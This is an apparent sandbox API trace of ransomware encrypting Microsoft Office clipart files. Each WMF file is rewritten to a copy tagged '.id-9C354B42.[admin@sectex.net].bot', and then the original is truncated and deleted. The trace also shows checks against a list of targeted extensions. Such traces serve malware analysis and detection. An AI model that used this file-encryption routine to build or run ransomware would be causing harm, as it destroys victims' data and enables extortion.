	[0143.576] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.576] lstrlenW (lpString="BS01635_.WMF") returned 12
	[0143.576] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01635_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0143.576] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=14996) returned 1
	[0143.576] CloseHandle (hObject=0x3c0) returned 1
	[0143.576] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01635_.wmf")) returned 0x20
	[0143.577] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01635_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.577] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01635_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0143.577] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.577] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.577] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01635_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0143.577] GetLastError () returned 0x0
	[0143.577] ReadFile (in: hFile=0x3c0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x3a94, lpOverlapped=0x0) returned 1
	[0143.579] WriteFile (in: hFile=0x3b4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x3aa0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x3aa0, lpOverlapped=0x0) returned 1
	[0143.580] ReadFile (in: hFile=0x3c0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.581] WriteFile (in: hFile=0x3b4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.581] SetEndOfFile (hFile=0x3b4) returned 1
	[0143.581] CloseHandle (hObject=0x3b4) returned 1
	[0143.581] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.581] SetEndOfFile (hFile=0x3c0) returned 1
	[0143.583] CloseHandle (hObject=0x3c0) returned 1
	[0143.583] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.583] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01635_.wmf")) returned 1
	[0143.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63
	[0143.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63
	[0143.584] lstrlenW (lpString=".doc") returned 4
	[0143.584] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.584] lstrlenW (lpString=".docx") returned 5
	[0143.584] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.584] lstrlenW (lpString=".pdf") returned 4
	[0143.584] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.584] lstrlenW (lpString=".xls") returned 4
	[0143.584] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.584] lstrlenW (lpString=".xlsx") returned 5
	[0143.584] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.584] lstrlenW (lpString=".ppt") returned 4
	[0143.584] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63
	[0143.584] lstrlenW (lpString=".zip") returned 4
	[0143.584] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.584] lstrlenW (lpString=".rar") returned 4
	[0143.584] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.584] lstrlenW (lpString=".bz2") returned 4
	[0143.584] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.585] lstrlenW (lpString=".7z") returned 3
	[0143.585] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63
	[0143.585] lstrlenW (lpString=".dbf") returned 4
	[0143.585] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63
	[0143.585] lstrlenW (lpString=".1cd") returned 4
	[0143.585] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63
	[0143.585] lstrlenW (lpString=".jpg") returned 4
	[0143.585] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63
	[0143.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63
	[0143.585] lstrlenW (lpString=".doc") returned 4
	[0143.585] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.585] lstrlenW (lpString=".docx") returned 5
	[0143.585] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.585] lstrlenW (lpString=".pdf") returned 4
	[0143.585] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.585] lstrlenW (lpString=".xls") returned 4
	[0143.585] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.585] lstrlenW (lpString=".xlsx") returned 5
	[0143.585] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.585] lstrlenW (lpString=".ppt") returned 4
	[0143.585] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63
	[0143.585] lstrlenW (lpString=".zip") returned 4
	[0143.585] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.585] lstrlenW (lpString=".rar") returned 4
	[0143.585] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.585] lstrlenW (lpString=".bz2") returned 4
	[0143.585] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.585] lstrlenW (lpString=".7z") returned 3
	[0143.586] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63
	[0143.586] lstrlenW (lpString=".dbf") returned 4
	[0143.586] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63
	[0143.586] lstrlenW (lpString=".1cd") returned 4
	[0143.586] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63
	[0143.586] lstrlenW (lpString=".jpg") returned 4
	[0143.586] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.586] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.586] lstrlenW (lpString="BS01636_.WMF") returned 12
	[0143.586] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01636_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0143.586] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=1874) returned 1
	[0143.586] CloseHandle (hObject=0x3c0) returned 1
	[0143.587] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01636_.wmf")) returned 0x20
	[0143.587] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01636_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.587] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01636_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0143.587] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.587] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.587] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01636_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0143.587] GetLastError () returned 0x0
	[0143.588] ReadFile (in: hFile=0x3c0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x752, lpOverlapped=0x0) returned 1
	[0143.589] WriteFile (in: hFile=0x3b4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x760, lpOverlapped=0x0) returned 1
	[0143.590] ReadFile (in: hFile=0x3c0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.590] WriteFile (in: hFile=0x3b4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.591] SetEndOfFile (hFile=0x3b4) returned 1
	[0143.591] CloseHandle (hObject=0x3b4) returned 1
	[0143.591] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.591] SetEndOfFile (hFile=0x3c0) returned 1
	[0143.594] CloseHandle (hObject=0x3c0) returned 1
	[0143.594] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.595] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01636_.wmf")) returned 1
	[0143.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63
	[0143.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63
	[0143.595] lstrlenW (lpString=".doc") returned 4
	[0143.595] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.595] lstrlenW (lpString=".docx") returned 5
	[0143.595] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.595] lstrlenW (lpString=".pdf") returned 4
	[0143.595] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.595] lstrlenW (lpString=".xls") returned 4
	[0143.595] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.595] lstrlenW (lpString=".xlsx") returned 5
	[0143.595] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.595] lstrlenW (lpString=".ppt") returned 4
	[0143.595] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63
	[0143.595] lstrlenW (lpString=".zip") returned 4
	[0143.595] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.595] lstrlenW (lpString=".rar") returned 4
	[0143.596] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.596] lstrlenW (lpString=".bz2") returned 4
	[0143.596] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.596] lstrlenW (lpString=".7z") returned 3
	[0143.596] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.596] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63
	[0143.596] lstrlenW (lpString=".dbf") returned 4
	[0143.596] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.596] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63
	[0143.596] lstrlenW (lpString=".1cd") returned 4
	[0143.596] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.596] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63
	[0143.596] lstrlenW (lpString=".jpg") returned 4
	[0143.596] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.596] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63
	[0143.596] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63
	[0143.596] lstrlenW (lpString=".doc") returned 4
	[0143.596] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.596] lstrlenW (lpString=".docx") returned 5
	[0143.596] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.596] lstrlenW (lpString=".pdf") returned 4
	[0143.596] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.596] lstrlenW (lpString=".xls") returned 4
	[0143.596] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.596] lstrlenW (lpString=".xlsx") returned 5
	[0143.596] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.596] lstrlenW (lpString=".ppt") returned 4
	[0143.596] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.596] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63
	[0143.596] lstrlenW (lpString=".zip") returned 4
	[0143.596] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.596] lstrlenW (lpString=".rar") returned 4
	[0143.596] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.597] lstrlenW (lpString=".bz2") returned 4
	[0143.597] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.597] lstrlenW (lpString=".7z") returned 3
	[0143.597] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.597] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63
	[0143.597] lstrlenW (lpString=".dbf") returned 4
	[0143.597] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.597] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63
	[0143.597] lstrlenW (lpString=".1cd") returned 4
	[0143.597] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.597] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63
	[0143.597] lstrlenW (lpString=".jpg") returned 4
	[0143.597] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.597] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.597] lstrlenW (lpString="BS01637_.WMF") returned 12
	[0143.597] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01637_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0143.598] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=3948) returned 1
	[0143.598] CloseHandle (hObject=0x3c0) returned 1
	[0143.598] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01637_.wmf")) returned 0x20
	[0143.598] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01637_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.598] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01637_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0143.598] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.598] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.598] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01637_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0143.599] GetLastError () returned 0x0
	[0143.599] ReadFile (in: hFile=0x3c0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0xf6c, lpOverlapped=0x0) returned 1
	[0143.600] WriteFile (in: hFile=0x3b4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xf70, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xf70, lpOverlapped=0x0) returned 1
	[0143.601] ReadFile (in: hFile=0x3c0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.601] WriteFile (in: hFile=0x3b4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.601] SetEndOfFile (hFile=0x3b4) returned 1
	[0143.601] CloseHandle (hObject=0x3b4) returned 1
	[0143.602] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.602] SetEndOfFile (hFile=0x3c0) returned 1
	[0143.603] CloseHandle (hObject=0x3c0) returned 1
	[0143.604] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.604] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01637_.wmf")) returned 1
	[0143.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63
	[0143.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63
	[0143.604] lstrlenW (lpString=".doc") returned 4
	[0143.604] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.604] lstrlenW (lpString=".docx") returned 5
	[0143.604] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.604] lstrlenW (lpString=".pdf") returned 4
	[0143.604] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.604] lstrlenW (lpString=".xls") returned 4
	[0143.604] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.605] lstrlenW (lpString=".xlsx") returned 5
	[0143.605] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.605] lstrlenW (lpString=".ppt") returned 4
	[0143.605] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.605] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63
	[0143.605] lstrlenW (lpString=".zip") returned 4
	[0143.605] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.605] lstrlenW (lpString=".rar") returned 4
	[0143.605] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.605] lstrlenW (lpString=".bz2") returned 4
	[0143.605] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.605] lstrlenW (lpString=".7z") returned 3
	[0143.777] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.777] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63
	[0143.777] lstrlenW (lpString=".dbf") returned 4
	[0143.777] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.777] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63
	[0143.777] lstrlenW (lpString=".1cd") returned 4
	[0143.777] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.777] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63
	[0143.777] lstrlenW (lpString=".jpg") returned 4
	[0143.777] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.777] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63
	[0143.777] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63
	[0143.777] lstrlenW (lpString=".doc") returned 4
	[0143.778] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.778] lstrlenW (lpString=".docx") returned 5
	[0143.778] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.778] lstrlenW (lpString=".pdf") returned 4
	[0143.778] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.778] lstrlenW (lpString=".xls") returned 4
	[0143.778] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.778] lstrlenW (lpString=".xlsx") returned 5
	[0143.778] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.778] lstrlenW (lpString=".ppt") returned 4
	[0143.778] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.778] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63
	[0143.778] lstrlenW (lpString=".zip") returned 4
	[0143.778] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.778] lstrlenW (lpString=".rar") returned 4
	[0143.778] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.778] lstrlenW (lpString=".bz2") returned 4
	[0143.778] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.778] lstrlenW (lpString=".7z") returned 3
	[0143.778] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.778] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63
	[0143.778] lstrlenW (lpString=".dbf") returned 4
	[0143.778] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.778] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63
	[0143.778] lstrlenW (lpString=".1cd") returned 4
	[0143.778] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.778] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63
	[0143.778] lstrlenW (lpString=".jpg") returned 4
	[0143.778] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.778] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.779] lstrlenW (lpString="CRANINST.WMF") returned 12
